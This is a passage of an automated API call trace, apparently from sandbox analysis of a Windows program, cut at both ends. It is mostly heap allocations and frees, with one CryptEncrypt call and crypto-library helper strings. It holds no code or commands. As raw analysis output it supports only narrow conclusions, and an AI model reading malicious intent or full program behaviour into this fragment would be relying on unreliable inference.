Flags=0x0, Size=0x30) returned 0x2f04118 [0241.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0241.709] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0241.709] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0241.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0241.710] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0241.711] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0241.711] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0241.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0241.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0241.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0241.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0241.712] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51358 [0241.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51358, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0241.712] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e94a68*, pdwDataLen=0x8cef60*=0x1472a, dwBufLen=0x14730 | out: pbData=0x2e94a68*, pdwDataLen=0x8cef60*=0x14730) returned 1 [0241.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978518 [0241.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0241.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55198 [0241.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0241.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0241.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0241.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0241.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0241.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0241.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0241.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0241.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0241.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0241.716] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0241.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0241.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0241.716] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0241.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0241.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0241.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0241.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55178 [0241.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0241.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55178 | out: hHeap=0x970000) returned 1 [0241.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0241.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0241.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0241.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0241.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0241.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0241.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0241.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0241.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0241.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0241.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0241.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0241.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0241.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0241.717] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0241.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0241.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0241.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0241.717] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551f8 [0241.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0241.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551f8 | out: hHeap=0x970000) returned 1 [0241.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0241.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0241.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0241.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0241.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0241.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0241.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0241.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0241.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e551e8 [0241.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0241.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551e8 | out: hHeap=0x970000) returned 1 [0241.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0241.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0241.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0241.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0241.718] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55268 [0241.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0241.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55268 | out: hHeap=0x970000) returned 1 [0241.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0241.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0241.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0241.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0241.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0241.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0241.718] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0241.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0241.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3c8 | out: hHeap=0x970000) returned 1 [0241.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0241.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0241.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0241.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0241.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0241.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0241.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0241.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0241.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0241.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0241.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0241.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0241.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0241.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0241.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0241.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0241.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0241.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0241.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0241.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0241.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0241.719] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0241.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0241.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0241.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0241.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0241.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0241.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0241.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0241.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0241.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0241.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0241.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0241.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0241.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0241.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0241.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0241.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0241.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0241.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0241.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0241.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0241.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0241.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0241.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0241.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0241.720] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978518 | out: hHeap=0x970000) returned 1 [0241.720] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.720] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55218 [0241.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55308 [0241.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551a8 [0241.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0241.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e551b8 [0241.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551b8 | out: hHeap=0x970000) returned 1 [0241.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551a8 | out: hHeap=0x970000) returned 1 [0241.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0241.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55308 | out: hHeap=0x970000) returned 1 [0241.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55218 | out: hHeap=0x970000) returned 1 [0241.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0241.721] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0241.721] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55298 [0241.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0241.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0241.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0241.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0241.721] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0241.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0241.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0241.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0241.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0241.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0241.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0241.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0241.721] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0241.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0241.721] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0241.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0241.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0241.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14730) returned 0x2ea91a0 [0241.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0241.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0241.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0241.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0241.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0241.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0241.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0241.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0241.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0241.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0241.722] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0241.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0241.722] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14730) returned 0x2ebd8d8 [0241.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea91a0 | out: hHeap=0x970000) returned 1 [0241.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0241.723] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0241.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0241.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0241.723] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0241.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0241.723] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0241.723] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0241.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0241.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0241.724] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0241.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0241.724] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0241.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0241.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0241.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51028 [0241.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0241.724] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0241.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0241.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0241.724] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0241.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0241.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0241.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51250 [0241.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0241.724] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0241.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0241.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0241.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0241.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0241.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0241.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0241.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0241.724] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0241.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0241.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510e8 [0241.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0241.724] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51040 [0241.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51268 [0241.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51058 [0241.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0241.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0241.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51118 [0241.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51298 [0241.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fe0 [0241.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0241.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0241.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0241.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0241.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0241.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0241.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0241.725] HeapFree (in: 